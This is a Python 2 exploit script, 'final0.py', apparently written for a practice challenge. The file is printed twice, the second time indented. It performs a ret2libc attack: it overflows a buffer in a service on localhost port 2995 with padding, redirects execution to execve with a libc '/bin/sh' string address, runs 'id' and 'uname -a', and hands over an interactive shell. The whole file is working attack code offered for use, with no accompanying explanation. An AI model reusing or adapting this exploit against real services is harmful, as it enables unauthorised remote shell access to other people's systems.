luc-lynx/final0.py

## final0.py
# ret2libc technique

import struct
import socket
import telnetlib

HOST = '127.0.0.1'
PORT = 2995

padding = 'a' * 510 + '\x00' + 'aaaabbbbccccddddeeeef'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

execve_ret = "AAAA" # return address for execve (we don't care about it)
execve = struct.pack("I", 0x08048c0c) # execve address
binsh = struct.pack("I", 1176511 + 0xb7e97000) # "/bin/sh" string address in the libc
exploit = padding + execve + execve_ret + binsh + '\x00' * 8

s.send(exploit + '\n')
s.send("id\n")
s.send("uname -a\n")

print s.recv(1024)

t = telnetlib.Telnet()
t.sock = s
t.interact()
	# ret2libc technique

	import struct
	import socket
	import telnetlib

	HOST = '127.0.0.1'
	PORT = 2995

	padding = 'a' * 510 + '\x00' + 'aaaabbbbccccddddeeeef'

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((HOST, PORT))

	execve_ret = "AAAA" # return address for execve (we don't care about it)
	execve = struct.pack("I", 0x08048c0c) # execve address
	binsh = struct.pack("I", 1176511 + 0xb7e97000) # "/bin/sh" string address in the libc
	exploit = padding + execve + execve_ret + binsh + '\x00' * 8

	s.send(exploit + '\n')
	s.send("id\n")
	s.send("uname -a\n")

	print s.recv(1024)

	t = telnetlib.Telnet()
	t.sock = s
	t.interact()